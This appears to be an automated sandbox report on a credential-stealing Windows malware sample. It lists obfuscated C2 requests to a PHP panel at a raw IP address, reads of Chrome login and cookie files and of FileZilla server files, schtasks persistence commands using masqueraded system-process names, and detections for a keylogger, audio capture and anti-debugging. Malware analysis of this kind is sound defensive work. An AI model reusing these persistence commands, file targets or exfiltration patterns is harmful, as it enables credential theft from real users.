request | GET http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&a306f393158675c42cc55f603bdd9d7b=4iLu0WYydWZsVGVgcmbph2Y0VmR&858aab17ea85b9cdc9b8e7d1e7011e4d=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&bd2ff74ccda1e107a0dd27bac8fa705e=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ |
request | GET http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&a306f393158675c42cc55f603bdd9d7b=4iLu42bpRXYtJ3bm5WagIXZoR3bgcmbph2Y0VmR&858aab17ea85b9cdc9b8e7d1e7011e4d=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&bd2ff74ccda1e107a0dd27bac8fa705e=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ |
request | GET http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&7f71c7203eb258a0ff2ed5e23c612feb=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&480b4baf3a8f7e254eed70f379218850=QTZ4UzN0gzY2cTZlJmZlZ2N1AzNhNWMhRTYkVWO5kTN&a306f393158675c42cc55f603bdd9d7b=9JicldWYuFWTg0WYyd2byBlI6IydvRmbpdFVDFkIs0nIoRXdhdmbpN3cp12Lc9Wau8mZulGcp9CXvwlOzBHd0hmI6ISZtRWYlJnIsICb19WZT9CXhl2cBJiOiUmbvpXZtlGdiwiI2gTMzAjI6ICbhR3cvBnIsISbvNWZsVGVgEWZy92SgYjN3QzUBJiOicmcvJCLiQDO3kjL2ITMsAjN2UjL3MjI6IyYvxmIsIiULJiOiknc05WdvNmIsICb19WZTJiOi42bpdWZyJCLiwWdvV2UiojI5RXajJCLiATNx4CNzEjL4AjMuUzNxIiOiAXaisnOi8mZulEcJJCLiIiOicUQUJCLiIjM0NXZ0JiOiUWbh5kclNXViwiIDBVLyIDVTVEViojIl1WYONEUiwiI0lmQgQjNg40SgwWYu9WazNXZm9mcQByNgM3dvRmbpdlI6IiclZlbpdlIsISWiojIulWbkF0cpJCLi4kI6ISbhNmYld1cpJCLiklI6ISZu9Gaw9mcjlWTzlmIsIyNuQjLzIiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&858aab17ea85b9cdc9b8e7d1e7011e4d=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&bd2ff74ccda1e107a0dd27bac8fa705e=MGZmdDNwcTNzYGMwUDZ2kDMjZGMjRzMzQDZkBjZzQmN |
request | GET http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&a306f393158675c42cc55f603bdd9d7b=4cDOyYzM04iNwoDMwoDMwAiOl1Wa0BCZlNHchxWRgESZu9GR&858aab17ea85b9cdc9b8e7d1e7011e4d=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&bd2ff74ccda1e107a0dd27bac8fa705e=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ |
request | POST http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM |
request | GET https://ipinfo.io/json |
request | POST http://80.87.202.232/1s39q1/xrgde8pz30dqxbwvije9hm8yyqyhdqud5is31hpf06v34jt6/uwc2mhyr8jienlvx14amrbs6p4uo2fz03835hw94ijsi7yly9f5rzdy6/6af934262e27a24857b6c11c7e2b6b5f.php?yifRmMo=uVq4&t3KgWklz5OtMKS583Z6ab0JH=KrO&Fty7Jfx2H=xfW3UwEb3sG&c2e31f68cf317ff081bc965d7e1744ad=gTO0gjN5cTYxIzYklTMxYTO4UWZyYDNyYmNwUTYhhTNyQ2YzkTY2MDM&ff67492f9817f18c3e42d07e0d4017f8=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM |
description | csrss.exe tried to sleep 323 seconds, actually delayed analysis time by 323 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies |
domain | ipinfo.io |
cmdline | "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\MSMAPI\1042\csrss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\바탕 화면\spoolsv.exe'" /rl HIGHEST /f |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
cmdline | "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\GPKI\conhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\srvany.exe'" /rl HIGHEST /f |
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications use DNS | rule | network_dns | ||||||
description | Run a keylogger | rule | keylogger | ||||||
description | Record Audio | rule | sniff_audio | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications use DNS | rule | network_dns | ||||||
description | Run a keylogger | rule | keylogger | ||||||
description | Record Audio | rule | sniff_audio | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook |
cmdline | "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\MSMAPI\1042\csrss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\바탕 화면\spoolsv.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\GPKI\conhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\srvany.exe'" /rl HIGHEST /f |
wmi | SELECT * FROM Win32_Processor |
wmi | SELECT * FROM Win32_BIOS |
wmi | Select * From Win32_ComputerSystem |
host | 80.87.202.232 |
cmdline | "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\MSMAPI\1042\csrss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\바탕 화면\spoolsv.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\GPKI\conhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\srvany.exe'" /rl HIGHEST /f |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |
wmi | SELECT * FROM AntivirusProduct |
wmi | SELECT * FROM Win32_DisplayConfiguration |
wmi | Select * From Win32_ComputerSystem |
wmi | SELECT * FROM FirewallProduct |
wmi | SELECT * FROM Win32_USBHub |
wmi | SELECT * FROM Win32_Processor |
wmi | SELECT * FROM Win32_BaseBoard |
wmi | SELECT * FROM Win32_BIOS |